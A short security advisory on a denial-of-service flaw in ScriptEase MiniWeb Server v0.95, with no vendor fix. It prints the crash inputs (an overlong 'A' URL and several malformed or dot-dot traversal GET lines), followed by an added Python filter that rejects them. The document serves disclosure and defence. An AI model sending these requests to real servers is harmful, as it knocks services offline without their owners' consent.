COMMAND

    ScriptEase MiniWeb Server DoS

SYSTEMS AFFECTED

    ScriptEase MiniWeb Server v0.95 (and possibly others)

PROBLEM

    Tamer Sahin [http://www.securityoffice.net] reported the following on the ScriptEase MiniWeb Server, which is written entirely in ScriptEase and distributed free by Nombas. This server is not intended to compete with commercial web servers; rather, it is meant to let you easily set up a personal web site and test page design and CGI scripts (http://www.nombas.com).

    ScriptEase MiniWeb Server is subject to a denial of service. Submitting a request of unusual length to the host will cause the server to crash. A restart is required in order to regain normal functionality.

        http://host/AAAAAA...(Ax2000)...AAAAAA

    Tested: Windows 2000 / ScriptEase MiniWeb Server v0.95

    Update (25 February 2002)
    ======

    'ken'@FTU added the following DoS lines:

        GET /%2e%2e/ HTTP/1.0
        GET /../../../../../../../../../ HTTP/1.0
        GET HTTP/1.0
        GET ../../../../../../../../../../ HTTP/1.0

SOLUTION

    Nothing yet.
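
With no fix available, the request lines listed above can be rejected by a filter placed in front of the server or flagged when reviewing logs. The sketch below is an added example, not part of the original advisory or of Nombas's code; the function name, the 1024-byte limit and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

MAX_TARGET_LEN = 1024  # assumed limit; the advisory's crash case used about 2000 bytes

# METHOD SP request-target SP HTTP-version, nothing else on the line.
REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) (HTTP/\d\.\d)$")


def check_request_line(line, max_len=MAX_TARGET_LEN):
    """Return the reasons to reject an HTTP request line (empty list = accept)."""
    m = REQUEST_LINE.match(line.rstrip("\r\n"))
    if m is None:
        # Covers "GET HTTP/1.0": a method and version with no request target.
        return ["malformed request line"]
    target = m.group(2)
    reasons = []
    if len(target) > max_len:
        reasons.append("request target too long")
    if not target.startswith("/"):
        # Also rejects proxy-style absolute URIs and "*", which a small
        # personal origin server has no need to accept.
        reasons.append("target is not an absolute path")
    # Decode repeatedly so %2e and double-encoded %252e both become ".".
    path = target.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    if ".." in path.replace("\\", "/").split("/"):
        reasons.append("dot-dot path segment")
    return reasons


if __name__ == "__main__":
    # Constructed sample input: the advisory's request lines plus one benign line.
    samples = [
        "GET /index.html HTTP/1.0",
        "GET /" + "A" * 2000 + " HTTP/1.0",
        "GET /%2e%2e/ HTTP/1.0",
        "GET /../../../../../../../../../ HTTP/1.0",
        "GET HTTP/1.0",
        "GET ../../../../../../../../../../ HTTP/1.0",
    ]
    for s in samples:
        print(s[:40], "->", check_request_line(s) or "accept")
```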